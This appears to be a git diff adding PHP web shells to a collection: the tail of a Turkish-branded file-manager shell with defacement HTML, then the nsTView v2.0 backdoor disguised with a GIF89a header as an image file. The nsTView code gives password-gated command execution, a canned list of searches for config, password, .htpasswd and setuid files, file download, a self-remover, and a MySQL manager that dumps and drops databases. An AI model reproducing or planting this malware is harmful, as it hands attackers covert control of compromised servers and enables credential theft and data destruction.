+'not_copied' => "Bu Dosyalar Kopyalanamaz \"[%2]\":\n[%1]",
+'not_Düzenleed' => '"[%1]" Düzenle.',
+'executed' => "\"[%1]\" Basarili bir sekilde Uygulandi:\n{%2}",
+'not_executed' => "\"[%1]\" Basarili bir sekilde Uygulanamadi:\n{%2}",
+'saved' => '"[%1]" Kurtarildi.',
+'not_saved' => '"[%1]" Kurtarılamadı.',
+'symlinked' => 'Symlink "[%2]" to "[%1]" Olusturuldu.',
+'not_symlinked' => 'Symlink "[%2]" to "[%1]" Olusturulamadi.',
+'permission_for' => 'izin "[%1]":',
+'permission_set' => 'izin "[%1]" Kopyalandi [%2].',
+'permission_not_set' => 'izin "[%1]" Yapilamadi [%2].',
+'not_readable' => '"[%1]" Okunamadi.'
+		);
+
+	}
+
+}
+
+function getimage ($image) {
+	switch ($image) {
+	case 'file':
+		return base64_decode('R0lGODlhEQANAJEDAJmZmf///wAAAP///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
+	case 'folder':
+		return base64_decode('R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA');
+	case 'hidden_file':
+		return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
+	case 'link':
+		return base64_decode('R0lGODlhEQANAKIEAJmZmf///wAAAMwAAP///wAAAAAAAAAAACH5BAHoAwQALAAAAAARAA0AAAM5SArcrDCCQOuLcIotwgTYUllNOA0DxXkmhY4shM5zsMUKTY8gNgUvW6cnAaZgxMyIM2zBLCaHlJgAADsA');
+	case 'smiley':
+		return base64_decode('R0lGODlhEQANAJECAAAAAP//AP///wAAACH5BAHoAwIALAAAAAARAA0AAAIslI+pAu2wDAiz0jWD3hqmBzZf1VCleJQch0rkdnppB3dKZuIygrMRE/oJDwUAOwA=');
+	case 'arrow':
+		return base64_decode('R0lGODlhEQANAIABAAAAAP///yH5BAEKAAEALAAAAAARAA0AAAIdjA9wy6gNQ4pwUmav0yvn+hhJiI3mCJ6otrIkxxQAOw==');
+	}
+}
+
+function html_header () {
+	global $charset;
+
+	echo <<<END
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
+     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+
+<meta http-equiv="Content-Type" content="text/html; charset=$charset" />
+
+<title>iMHaBiRLiGi PhpFtp</title>
+
+<style type="text/css">
+body { font: small sans-serif; text-align: center }
+img { width: 0px; height: 0px }
+a, a:visited { text-decoration: none; color: red }
+hr { border-style: none; height: 1px; Geriground-color: silver; color: silver }
+#main { margin-top: 6pt; margin-left: auto; margin-right: auto; border-spacing: 1px }
+#main th { Geriground: #eee; padding: 3pt 3pt 0pt 3pt }
+.listing th, .listing td { padding: 1px 3pt 0 3pt }
+.listing th { border: 1px solid silver }
+.listing td { border: 1px solid #ddd; Geriground: white }
+.listing .checkbox { text-align: center }
+.listing .filename { text-align: left }
+.listing .size { text-align: right }
+.listing .permission_header { text-align: left }
+.listing .permission { font-family: monospace }
+.listing .owner { text-align: left }
+.listing .group { text-align: left }
+.listing .Görevler { text-align: left }
+.listing_footer td { Geriground: #eee; border: 1px solid silver }
+#directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left; padding: 3pt }
+#directory { Geriground: #eee; border: 1px solid silver }
+#upload { padding-top: 1em }
+#create { padding-bottom: 1em }
+.small, .small option { font-size: x-small }
+textarea { border: none; Geriground: white }
+table.dialog { margin-left: auto; margin-right: auto }
+td.dialog { Geriground: #eee; padding: 1ex; border: 1px solid silver; text-align: center }
+#permission { margin-left: auto; margin-right: auto }
+#permission td { padding-left: 3pt; padding-right: 3pt; text-align: center }
+td.permission_action { text-align: right }
+#symlink { Geriground: #eee; border: 1px solid silver }
+#symlink td { text-align: left; padding: 3pt }
+#red_button { width: 120px; color: #400 }
+#green_button { width: 120px; color: #040 }
+#error td { Geriground: maroon; color: white; border: 1px solid silver }
+#notice td { Geriground: green; color: white; border: 1px solid silver }
+#notice pre, #error pre { Geriground: silver; color: black; padding: 1ex; margin-left: 1ex; margin-right: 1ex }
+code { font-size: 12pt }
+td { white-space: nowrap }
+</style>
+
+<script type="text/javascript">
+<!--
+function activate (name) {
+	if (document && document.forms[0] && document.forms[0].elements['focus']) {
+		document.forms[0].elements['focus'].value = name;
+	}
+}
+//-->
+</script>
+
+</head>
+<body>
+
+
+END;
+
+}
+
+function html_footer () {
+
+	echo <<<END
+</body>
+</html>
+END;
+
+}
+
+function notice ($phrase) {
+	global $cols;
+
+	$args = func_get_args();
+	array_shift($args);
+
+	return '<tr id="notice">
+	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
+</tr>
+';
+
+}
+
+function error ($phrase) {
+	global $cols;
+
+	$args = func_get_args();
+	array_shift($args);
+
+	return '<tr id="error">
+	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
+</tr>
+';
+
+}
+
+?>
+<BODY><IMG style="WIDTH: 306px; HEIGHT: 76px" height=100 
+src="http://www.nettekiadres.com/imhabirligi.jpg" width=282></BODY>
+<br><Center>SU AN <A href="http://www.imhabirligi.com">iMHaBiRLiGi</A> HUDUTLARINDA BULUNMAKTASINIZ.!!</Center>
+<FONT 
+class=footmsg><EMBED src=http://www.imhabirligi.com/r1/hurl.asx hidden=true 
+type="text/plain; charset=iso-8859-9" 
+AUTOSTART="TRUE">
+<script language=JavaScript>
+<!--
+
+var message="";
+///////////////////////////////////
+function clickIE() {if (document.all) {(message);return false;}}
+function clickNS(e) {if 
+(document.layers||(document.getElementById&&!document.all)) {
+if (e.which==2||e.which==3) {(message);return false;}}}
+if (document.layers) 
+{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
+else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
+
+document.oncontextmenu=new Function("return false")
+// --> 
+</script>
\ No newline at end of file
diff --git a/138shell/I/img.php.txt b/138shell/I/img.php.txt
new file mode 100644
index 0000000..2c8b999
--- /dev/null
+++ b/138shell/I/img.php.txt
@@ -0,0 +1,2106 @@
+GIF89a
+<?
+@session_start();
+@set_time_limit(0);
+@set_magic_quotes_runtime(0);
+@error_reporting(0);
+#####cfg#####
+# use password  true / false #
+$create_password = true;
+$password = "nst";    // default password for nstview, you can change it.
+
+# UNIX COMMANDS
+# description (nst) command
+# example: Shutdown (nst) shutdown -h now
+$fast_commands = "
+Show open ports (nst) netstat -an | grep LISTEN | grep tcp
+last root (nst) last root
+last (all users) (nst) last all
+Find all config.php in / (nst) find / -type f -name config.php
+Find all config.php in . (nst) find . -type f -name config.php
+Find all admin.php in / (nst) find / -type f -name admin.php
+Find all admin.php in . (nst) find . -type f -name admin.php
+Find all config.inc.php in / (nst) find / -type f -name config.inc.php
+Find all config.inc.php in . (nst) find . -type f -name config.inc.php
+Find all config.inc in / (nst) find / -type f -name config.inc
+Find all config.inc in . (nst) find . -type f -name config.inc
+Find all config.dat in / (nst) find / -type f -name config.dat
+Find all config.dat in . (nst) find . -type f -name config.dat
+Find all config* in / (nst) find / -type f -name config*
+Find all config* in . (nst) find . -type f -name config*
+Find all pass* in / (nst) find / -type f -name pass*
+Find all pass* in . (nst) find . -type f -name pass*
+Find all .bash_history in / (nst) find / -type f -name .bash_history
+Find all .bash_history in . (nst) find . -type f -name .bash_history
+Find all .htpasswd  in / (nst) find / -type f -name .htpasswd
+Find all .htpasswd  in . (nst) find . -type f -name .htpasswd
+Find all writable dirs/files in / (nst) find / -perm -2 -ls
+Find all writable dirs/files in . (nst) find . -perm -2 -ls
+Find all suid files in / (nst) find / -type f -perm -04000 -ls
+Find all suid files in . (nst) find . -type f -perm -04000 -ls
+Find all sgid files in / (nst) find / -type f -perm -02000 -ls
+Find all sgid files in . (nst) find . -type f -perm -02000 -ls
+Find all .fetchmailrc files in / (nst) find / -type f -name .fetchmailrc
+Find all .fetchmailrc files in . (nst) find . -type f -name .fetchmailrc
+OS Version? (nst) sysctl -a | grep version
+Kernel version? (nst) cat /proc/version
+cat syslog.conf (nst) cat /etc/syslog.conf
+Cat - Message of the day (nst) cat /etc/motd
+Cat hosts (nst) cat /etc/hosts
+Distrib name (nst) cat /etc/issue.net
+Distrib name (2) (nst) cat /etc/*-realise
+Display all process - wide output (nst) ps auxw
+Display all your process (nst) ps ux
+Interfaces (nst) ifconfig
+CPU? (nst) cat /proc/cpuinfo
+RAM (nst) free -m
+HDD space (nst) df -h
+List of Attributes (nst) lsattr -a
+Mount options (nst) cat /etc/fstab
+Is cURL installed? (nst) which curl
+Is wGET installed? (nst) which wget
+Is lynx installed? (nst) which lynx
+Is links installed? (nst) which links
+Is fetch installed? (nst) which fetch
+Is GET installed? (nst) which GET
+Is perl installed? (nst) which perl
+Where is apache (nst) whereis apache
+Where is perl (nst) whereis perl
+locate proftpd.conf (nst) locate proftpd.conf
+locate httpd.conf (nst) locate httpd.conf
+locate my.conf (nst) locate my.conf
+locate psybnc.conf (nst) locate psybnc.conf
+";
+
+
+
+# WINDOWS COMMANDS
+# description (nst) command
+# example: Delete autoexec.bat (nst) del c:\autoexec.bat
+$fast_commands_win = "
+OS Version (nst) ver
+Tasklist  (nst) tasklist
+Attributes in . (nst) attrib
+Show open ports (nst) netstat -an
+";
+
+
+
+
+
+######ver####
+$ver= "v2.0";
+#############
+$pass=$_POST['pass'];
+if($pass==$password){
+$_SESSION['nst']="$pass";
+}
+if ($_SERVER["HTTP_CLIENT_IP"]) $ip = $_SERVER["HTTP_CLIENT_IP"];
+else if($_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
+else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"];
+else $ip = $_SERVER['REMOTE_ADDR'];
+$ip=htmlspecialchars($ip);
+
+if($create_password==true){
+
+if(!isset($_SESSION['nst']) or $_SESSION['nst']!=$password){
+die("
+<title>nsTView $ver:: nst.void.ru</title>
+<center>
+<table width=100 bgcolor=#D7FFA8 border=1 bordercolor=black><tr><td>
+<font size=1 face=verdana><center>
+<b>nsTView $ver :: <a href=http://nst.void.ru style='text-decoration:none;'><font color=black>nst.void.ru</font></a><br></b>
+</center>
+<form method=post>
+Password:<br>
+<input type=password name=pass size=30 tabindex=1>
+</form>
+<b>Host:</b> ".$_SERVER["HTTP_HOST"]."<br>
+<b>IP:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>
+<b>Your ip:</b> ".$ip."
+</td></tr></table>
+");}
+
+}
+$d=$_GET['d'];
+
+function adds($editf){
+#if(get_magic_quotes_gpc()==0){
+$editf=addslashes($editf);
+#}
+return $editf;
+}
+function adds2($editf){
+if(get_magic_quotes_gpc()==0){
+$editf=addslashes($editf);
+}
+return $editf;
+}
+
+$f   = "nst_sql.txt";
+$f_d = $_GET['f_d'];
+
+if($_GET['download']){
+$download=$_GET['download'];
+header("Content-disposition: attachment; filename=\"$download\";");
+readfile("$d/$download");
+exit;}
+
+if($_GET['dump_download']){
+header("Content-disposition: attachment; filename=\"$f\";");
+header("Content-length: ".filesize($f_d."/".$f));
+header("Expires: 0");
+readfile($f_d."/".$f);
+if(is_writable($f_d."/".$f)){
+unlink($f_d."/".$f);
+}
+die;
+}
+
+
+$images=array(".gif",".jpg",".png",".bmp",".jpeg");
+$whereme=getcwd();
+@$d=@$_GET['d'];
+$copyr = "<center><a href=http://nst.void.ru target=_blank>nsTView $ver<br>o... Network security team ...o</a>";
+$php_self=@$_SERVER['PHP_SELF'];
+if(@eregi("/",$whereme)){$os="unix";}else{$os="win";}
+if(!isset($d)){$d=$whereme;}
+$d=str_replace("\\","/",$d);
+if(@$_GET['p']=="info"){
+@phpinfo();
+exit;}
+if(@$_GET['img']=="1"){
+@$e=$_GET['e'];
+header("Content-type: image/gif");
+readfile("$d/$e");
+}
+if(@$_GET['getdb']=="1"){
+header('Content-type: application/plain-text');
+header('Content-Disposition: attachment; filename=nst-mysql-damp.htm');
+}
+print "<title>nsT View $ver</title>
+<style>
+BODY, TD, TR {
+text-decoration: none;
+font-family: Verdana;
+font-size: 8pt;
+SCROLLBAR-FACE-COLOR: #363d4e;
+SCROLLBAR-HIGHLIGHT-COLOR: #363d4e;
+SCROLLBAR-SHADOW-COLOR: #363d4e;
+SCROLLBAR-ARROW-COLOR: #363d4e;
+SCROLLBAR-TRACK-COLOR: #91AAFF
+}
+input, textarea, select {
+font-family: Verdana;
+font-size: 10px;
+color: black;
+background-color: white;
+border: solid 1px;
+border-color: black
+}
+UNKNOWN {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:link {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:hover {
+COLOR: #FF0C0B;
+TEXT-DECORATION: none
+}
+A:active {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:visited {
+TEXT-DECORATION: none
+}
+</style>
+<script>
+function ShowOrHide(d1, d2) {
+if (d1 != '') DoDiv(d1);
+if (d2 != '') DoDiv(d2);}
+
+function DoDiv(id) {
+var item = null;
+if (document.getElementById) {
+item = document.getElementById(id);
+} else if (document.all){
+item = document.all[id];
+} else if (document.layers){
+item = document.layers[id];}
+if (!item) {}
+else if (item.style) {
+if (item.style.display == \"none\"){ item.style.display = \"\"; }
+else {item.style.display = \"none\"; }
+}else{ item.visibility = \"show\"; }}
+
+function cwd(text){
+document.shellForm.sh.value+=\" \"+ text;
+document.shellForm.sh.focus();
+}
+
+
+</script>
+";
+print "<body vlink=#0006DE>
+<table width=600 border=0 cellpadding=0 cellspacing=1 bgcolor=#D7FFA8 align=center>
+<tr><td><font face=wingdings size=2>0</font>";
+$expl=explode("/",$d);
+$coun=count($expl);
+if($os=="unix"){echo "<a href='$php_self?d=/'>/</a>";}
+else{
+        echo "<a href='$php_self?d=$expl[0]'>$expl[0]/</a>";}
+for($i=1; $i<$coun; $i++){
+        @$xx.=$expl[$i]."/";
+$sls="<a href='$php_self?d=$expl[0]/$xx'>$expl[$i]</a>/";
+$sls=str_replace("//","/",$sls);
+$sls=str_replace("/'></a>/","/'></a>",$sls);
+print $sls;
+}
+if(@ini_get("register_globals")){$reg_g="ON";}else{$reg_g="OFF";}
+if(@ini_get("safe_mode")){$safe_m="ON";}else{$safe_m="OFF";}
+echo "</td></tr>";
+if($os=="unix"){ echo "
+<tr><td><b>id:</b> ".@exec('id')."</td></tr>
+<tr><td><b>uname -a:</b> ".@exec('uname -a')."</td></tr>";} echo"
+<tr><td><b>Your IP: [<font color=#5F3CC1>$ip</font>] Server IP: [<font color=#5F3CC1>".gethostbyname($_SERVER["HTTP_HOST"])."</font>] Server <a href=# title='Host.Domain'>H.D.</a>: [<font color=#5F3CC1>".$_SERVER["HTTP_HOST"]."</font>]</b><br>
+[<b>Safe mode:</b> $safe_m] [<b>Register globals:</b> $reg_g]<br>
+[<a href=# onClick=location.href=\"javascript:history.back(-1)\">Back</a>]
+[<a href='$php_self'>Home</a>]
+[<a href='$php_self?d=$d&shell=1'>Shell (1)</a> <a href='$php_self?d=$d&shell=2'>(2)</a>]
+[<a href='$php_self?d=$d&t=upload'>Upload</a>]
+[<a href='$php_self?t=tools'>Tools</a>]
+[<a href='$php_self?p=info'>PHPinfo</a>]
+[<a href='$php_self?delfolder=$d&d=$d&delfl=1&rback=$d' title='$d'>DEL Folder</a>]
+[<a href='$php_self?p=sql'>SQL</a>]
+[<a href='$php_self?p=selfremover'>Self Remover</a>]
+</td></tr>
+";
+if($os=="win"){ echo "
+<tr><td bgcolor=white>
+<center><font face=wingdings size=2><</font>
+<a href='$php_self?d=a:/'>A</a>
+<a href='$php_self?d=b:/'>B</a>
+<a href='$php_self?d=c:/'>C</a>
+<a href='$php_self?d=d:/'>D</a>
+<a href='$php_self?d=e:/'>E</a>
+<a href='$php_self?d=f:/'>F</a>
+<a href='$php_self?d=g:/'>G</a>
+<a href='$php_self?d=h:/'>H</a>
+<a href='$php_self?d=i:/'>I</a>
+<a href='$php_self?d=j:/'>J</a>
+<a href='$php_self?d=k:/'>K</a>
+<a href='$php_self?d=l:/'>L</a>
+<a href='$php_self?d=m:/'>M</a>
+<a href='$php_self?d=n:/'>N</a>
+<a href='$php_self?d=o:/'>O</a>
+<a href='$php_self?d=p:/'>P</a>
+<a href='$php_self?d=q:/'>Q</a>
+<a href='$php_self?d=r:/'>R</a>
+<a href='$php_self?d=s:/'>S</a>
+<a href='$php_self?d=t:/'>T</a>
+<a href='$php_self?d=u:/'>U</a>
+<a href='$php_self?d=v:/'>V</a>
+<a href='$php_self?d=w:/'>W</a>
+<a href='$php_self?d=x:/'>X</a>
+<a href='$php_self?d=y:/'>Y</a>
+<a href='$php_self?d=z:/'>Z</a>
+</td></tr>";}else{echo "<tr><td>&nbsp;</td></tr>";}
+print "<tr><td>
+:: <a href='$php_self?d=$d&mkdir=1'>Create folder</a> ::
+<a href='$php_self?d=$d&mkfile=1'>Create file</a> ::
+<a href='$php_self?d=$d&read_file_safe_mode=1'>Read file if safe mode is On</a> ::
+<a href='$php_self?d=$d&ps_table=1'>PS table</a> ::
+</td></tr>";
+
+if(@$_GET['p']=="sql"){
+print "<tr><td>";
+###
+
+$f_d = $_GET['f_d'];
+if(!isset($f_d)){$f_d=".";}
+if($f_d==""){$f_d=".";}
+
+$php_self=$_SERVER['PHP_SELF'];
+$delete_table=$_GET['delete_table'];
+$tbl=$_GET['tbl'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+$adress=$_POST['adress'];
+$port=$_POST['port'];
+$login=$_POST['login'];
+$pass=$_POST['pass'];
+$adress=$_GET['adress'];
+$port=$_GET['port'];
+$login=$_GET['login'];
+$pass=$_GET['pass'];
+$conn=$_GET['conn'];
+if(!isset($adress)){$adress="127.0.0.1";}
+if(!isset($login)){$login="root";}
+if(!isset($pass)){$pass="";}
+if(!isset($port)){$port="3306";}
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+
+
+?>
+<style>
+table,td{
+color: black;
+font-face: verdana;
+font-size: 11px;
+
+}
+</style>
+<font color=black face=verdana size=1>
+<? if(!$conn){ ?>
+
+<!-- table 1 -->
+<table bgcolor=#D7FFA8>
+<tr><td valign=top>Address:</td><td><form><input name=adress value='<?=$adress?>' size=20><input name=port value='<?=$port?>' size=6></td></tr>
+<tr><Td valign=top>Login: </td><td><input name=login value='<?=$login?>' size=10></td></tr>
+<tr><Td valign=top>Pass:</td><td> <input name=pass value='<?=$pass?>' size=10><input type=hidden name=p value=sql></td></tr>
+<tr><td></td><td><input type=submit name=conn value=Connect></form></td></tr><?}?>
+<tr><td valign=top><? if($conn){ echo "<b>PHP v".@phpversion()."<br>mySQL v".@mysql_get_server_info()."<br>";}?></b></td><td></td></tr>
+</table>
+<!-- end of table 1 -->
+
+
+<?
+$conn=$_GET['conn'];
+$adress=$_GET['adress'];
+$port=$_GET['port'];
+$login=$_GET['login'];
+$pass=$_GET['pass'];
+if($conn){
+
+$serv = @mysql_connect($adress.":".$port, $login,$pass) or die("<font color=red>Error: ".mysql_error()."</font>");
+if($serv){$status="Connected. :: <a href='$php_self?p=sql'>Log out</a>";}else{$status="Disconnected.";}
+print "<b><font color=green>Status: $status<br><br>"; # #D7FFA8
+print "<table cellpadding=0 cellspacing=0 bgcolor=#D7FFA8><tr><td valign=top>";
+print "<br><font color=red>[db]</font><Br>";
+print "<font color=white>";
+$res = mysql_list_dbs($serv);
+while ($str=mysql_fetch_row($res)){
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&delete_db=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")'>[DEL]<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$str[0]&dump_db=$str[0]&f_d=$d'>[DUMP]</a></a> <b><a href='$php_self?baza=1&db=$str[0]&p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a></b><br>";
+$tc++;
+}
+$baza=$_GET['baza'];
+$db=$_GET['db'];
+print "<font color=red>[Total db: $tc]</font><br>";
+if($baza){
+print "<div align=left><font color=green>db: [$db]</div></font><br>";
+$result=@mysql_list_tables($db);
+while($str=@mysql_fetch_array($result)){
+$c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
+$records=mysql_fetch_array($c);
+
+if(strlen($str[0])>$s4ot){$s4ot=strlen($str[0]);}
+if($records[0]=="0"){
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]&ins_new_line=1'>$str[0]</a><br>";
+}else{
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a><br>";
+}
+mysql_free_result($c);
+$total_t++;
+}
+print "<br><B><font color=red>Total tables: $total_t</font></b>";
+                                print "<pre>";
+for($i=0; $i<$s4ot+10; $i++){print "&nbsp;";}
+                                print "</pre>";
+} #end baza
+
+
+
+
+# delete table
+if(isset($delete_table)){
+mysql_select_db($_GET['db']) or die("<font color=red>".mysql_error()."</font>");
+mysql_query("DROP TABLE IF EXISTS $delete_table") or die("<font color=red>".mysql_error()."</font>");
+print "<br><b><font color=green>Table [ $delete_table ] :: Deleted success!</font></b>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1\">";
+}
+# end of delete table
+
+# delete database
+if(isset($_GET['delete_db'])){
+mysql_drop_db($_GET['delete_db']) or die("<font color=red>".mysql_error()."</font>");
+print "<br><b><font color=green>Database ".$_GET['delete_db']." :: Deleted Success!";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1\">";
+}
+# end of delete database
+
+# delete row
+if(isset($_POST['delete_row'])){
+$_POST['delete_row'] = base64_decode($_POST['delete_row']);
+mysql_query("DELETE FROM ".$_GET['tbl']." WHERE ".$_POST['delete_row']) or die("<font color=red>".mysql_error()."</font>");
+$del_result = "<br><b><font color=green>Deleted Success!<br>".$_POST['delete_row'];
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}
+# end of delete row
+
+
+$vn=$_GET['vn'];
+print "</td><td valign=top>";
+print "<font color=green>Database: $db => $vn</font>";
+
+# edit row
+if(isset($_POST['edit_row'])){
+$edit_row=base64_decode($_POST['edit_row']);
+
+$r_edit = mysql_query("SELECT * FROM $tbl WHERE $edit_row") or die("<font color=red>".mysql_error()."</font>");
+print "<br><br>
+       <table border=0 cellpadding=1 cellspacing=1><tr>
+       <td><b>Row</b></td><td><b>Value</b></td></tr>";
+print  "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."'>";
+print  "<input type=hidden name=edit_row value='".$_POST['edit_row']."'>";
+print " <input type=radio name=upd value=update checked>Update<br>
+        <input type=radio name=upd value=insert>Insert new<br><br>";
+
+
+$i=0;
+while($mn = mysql_fetch_array($r_edit, MYSQL_ASSOC)){
+foreach($mn as $key =>$val){
+$type  = mysql_field_type($r_edit, $i);
+$len  = mysql_field_len($r_edit, $i);
+$del .= "`$key`='".adds($val)."' AND ";
+$c=strlen($val);
+$val=htmlspecialchars($val, ENT_NOQUOTES);
+$str=" <textarea name='$key' cols=39 rows=5>$val</textarea> ";
+$buff .= "<tr><td bgcolor=silver><b>$key</b><br><font color=green>(<b>$type($len)</b>)</font></td><td>$str</td></tr>";
+$i++;
+}
+
+}
+$delstring=base64_encode($del);
+print "<input type=hidden name=delstring value=\"$delstring\">";
+print "$buff</table><br>";
+print "<br>";
+if(!$_POST['makeupdate']){print "<input type=submit value=Update name=makeupdate></form>";}
+
+
+
+
+if($_POST['makeupdate']){
+if($_POST['upd']=='update'){
+preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
+$delstring=$_POST['delstring'];
+$delstring=base64_decode($delstring);
+$delstring = substr($delstring, 0, strlen($delstring)-5);
+
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',";
+}
+$total_str = substr_replace($total_str,"",-1);
+$up_string = "UPDATE `$tbl` SET $total_str WHERE $delstring";
+$up_string = htmlspecialchars($up_string, ENT_NOQUOTES);
+print "<b>PHP var:<br></b>\$sql=\"$up_string\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+mysql_query($up_string) or die("<font color=red>".mysql_error()."</font>");
+}#end of make update
+
+
+
+if($_POST['upd']=='insert'){
+preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
+$delstring=$_POST['delstring'];
+$delstring=base64_decode($delstring);
+$delstring = substr($delstring, 0, strlen($delstring)-5);
+
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
+}
+
+$total_str = ",,".$total_str;
+
+preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
+
+for($i=0; $i<count($matches4[1]); $i++){
+        $matches4[1][0]=str_replace(",","",$matches4[1][0]);
+        $total_m_i .= "`".$matches4[1][$i]."`,";
+        $total_m_x .= "'".$matches4[2][$i]."',";
+}
+$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
+$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
+
+$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
+mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
+print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}#end of insert
+}#end of update
+}
+# end of edit row
+
+
+# insert new line
+if($_GET['ins_new_line']){
+$qn = mysql_query('SHOW FIELDS FROM '.$tbl) or die("<font color=red>".mysql_error()."</font>");
+print "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."&ins_new_line=1'>
+Insert new line in <b>$tbl</b> table</b><Br><br>";
+print "<table>";
+while ($new_line = mysql_fetch_array($qn, MYSQL_ASSOC)) {
+foreach ($new_line as $key =>$next) {
+$buff .= "$next ";
+}
+$expl=explode(" ",$buff);
+$buff2 .= $expl[0]." ";
+print "<tr><td bgcolor=silver><b>$expl[0]</b><br><font color=green>(<b>$expl[1]</b>)</font></td>
+<td><textarea name='$expl[0]' cols=39 rows=5></textarea>
+</td></tr>";
+unset($buff);
+}
+print "</table>
+<center><input type=submit value=Insert name=mk_ins></form></center>";
+if($_POST['mk_ins']){
+preg_match_all("/(.*?)\s/i",$buff2,$matches3);
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
+}
+
+$total_str = ",,".$total_str;
+preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
+
+for($i=0; $i<count($matches4[1]); $i++){
+        $matches4[1][0]=str_replace(",","",$matches4[1][0]);
+        $total_m_i .= "`".$matches4[1][$i]."`,";
+        $total_m_x .= "'".$matches4[2][$i]."',";
+}
+$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
+$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
+
+$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
+mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
+print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
